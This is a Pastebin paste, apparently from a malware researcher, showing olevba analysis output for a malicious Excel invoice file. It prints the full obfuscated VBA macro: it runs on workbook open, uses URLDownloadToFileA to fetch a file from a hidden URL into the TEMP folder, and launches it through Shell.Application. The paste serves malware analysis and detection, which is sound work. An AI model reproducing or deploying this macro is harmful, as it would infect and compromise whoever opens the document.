dynamoo

Malicious Excel macro

Mar 11th, 2015
331
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS---- inv86-~1.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: inv86-~1.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Workbook_Open()
  16. atqk_x482mp6v
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+---------------+----------------------------------------+
  21. | Type     | Keyword       | Description                            |
  22. +----------+---------------+----------------------------------------+
  23. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  24. +----------+---------------+----------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Ëèñò1.cls
  27. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. (empty macro)
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Ëèñò2.cls
  32. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. (empty macro)
  35. -------------------------------------------------------------------------------
  36. VBA MACRO Ëèñò3.cls
  37. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  38. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  39. (empty macro)
  40. -------------------------------------------------------------------------------
  41. VBA MACRO Class1.cls
  42. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
  43. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  44. (empty macro)
  45. -------------------------------------------------------------------------------
  46. VBA MACRO Class2.cls
  47. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
  48. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  49. (empty macro)
  50. -------------------------------------------------------------------------------
  51. VBA MACRO ÀàâïàâïÀÀ.bas
  52. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u0410\u0430\u0432\u043f\u0430\u0432\u043f\u0410\u0410'
  53. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  54.  
  55. Public Function tIBlTVqSYlvQeRDfBAc(VdkAbaqgjbz As String) As String
  56. For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
  57. tIBlTVqSYlvQeRDfBAc = tIBlTVqSYlvQeRDfBAc & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
  58. Next
  59. End Function
  60.  
  61. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  62. ANALYSIS:
  63. No suspicious keyword or IOC found.
  64. -------------------------------------------------------------------------------
  65. VBA MACRO Class3.cls
  66. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
  67. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  68. (empty macro)
  69. -------------------------------------------------------------------------------
  70. VBA MACRO Class4.cls
  71. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
  72. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  73. (empty macro)
  74. -------------------------------------------------------------------------------
  75. VBA MACRO Class5.cls
  76. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
  77. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  78. (empty macro)
  79. -------------------------------------------------------------------------------
  80. VBA MACRO ûâàûâÀÀâà.bas
  81. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u044b\u0432\u0430\u044b\u0432\u0410\u0410\u0432\u0430'
  82. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  83. #If VBA7 Then
  84.     Private Declare PtrSafe Function ãøÏÍØûâàà Lib "urlmon" Alias _
  85.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  86.     ByVal ÏÑðïñïñïïÎàï As String, _
  87.     ByVal ÏÑðïñïñïïÎàïf As String, _
  88.     ByVal ÏÑðïñïñïïÎàïfd As Long, _
  89.     ByVal ÏÑðïñïñïïÎàïfds As LongPtr) As LongPtr
  90. #Else
  91.     Private Declare Function ãøÏÍØûâàà Lib "urlmon" Alias _
  92.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
  93.     ByVal ÏÑðïñïñïïÎàï As String, _
  94.     ByVal ÏÑðïñïñïïÎàïf As String, _
  95.     ByVal ÏÑðïñïñïïÎàïfd As Long, _
  96.     ByVal ÏÑðïñïñïïÎàïfds As Long) As Long
  97. #End If
  98. Sub atqk_x482mp6v()
  99. ðïîðïÀàâïàâï tIBlTVqSYlvQeRDfBAc(Chr$(104) & Chr$(43) & Chr$(116) & Chr$(83) & Chr$(116) & Chr$(38) & Chr$(112) & Chr$(47) & Chr$(58) & Chr$(73) & Chr$(47) & Chr$(93) & Chr$(47) & Chr$(134) & Chr$(48) & Chr$(60) & Chr$(51) & Chr$(35) & Chr$(52) & Chr$(109) & Chr$(48) & Chr$(61) & Chr$(52) & Chr$(104) & Chr$(101) & Chr$(102) & Chr$(98) & Chr$(56) & Chr$(46) & Chr$(120) & Chr$(110) & Chr$(54) & Chr$(101) & Chr$(126) & Chr$(116) & Chr$(134) & Chr$(115) & Chr$(84) & Chr$(111) & Chr$(35) & Chr$(108) & Chr$(56) & Chr$(104) & Chr$(45) & Chr$(111) & Chr$(80) & Chr$(115) & Chr$(74) & Chr$(116) & Chr$(118) & Chr$(46) & Chr$(60) & Chr$(99) & Chr$(107) & Chr$(111) & Chr$(92) & Chr$(109) & Chr$(84) & Chr$(47) & Chr$(107) & Chr$(106) & Chr$(40) & Chr$(115) & Chr$(68) & Chr$(47) & Chr$(109) & Chr$(98) & Chr$(86) & Chr$(105) & Chr$(104) & Chr$(110) & Chr$(49) & Chr$(46) & Chr$(39) & Chr$(101) _
  100. & Chr$(96) & Chr$(120) & Chr$(99) & Chr$(101) & Chr$(62)), Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _
  101. 109) & Chr$(80) & Chr$(123))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))
  102.  
  103.  
  104. End Sub
  105. Function ðïîðïÀàâïàâï(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
  106. ïëðïÀÀàâïï = ãøÏÍØûâàà(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
  107. Set ûâàÀÀâûàûâà = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
  108.  
  109. ûâàÀÀâûàûâà.Open Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
  110. End Function
  111.  
  112.  
  113.  
  114.  
  115.  
  116. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  117. ANALYSIS:
  118. +------------+--------------------+-----------------------------------------+
  119. | Type       | Keyword            | Description                             |
  120. +------------+--------------------+-----------------------------------------+
  121. | Suspicious | CreateObject       | May create an OLE object                |
  122. | Suspicious | Lib                | May run code from a DLL                 |
  123. | Suspicious | Open               | May open a file                         |
  124. | Suspicious | Environ            | May read system environment variables   |
  125. | Suspicious | Chr                | May attempt to obfuscate specific       |
  126. |            |                    | strings                                 |
  127. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  128. +------------+--------------------+-----------------------------------------+
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×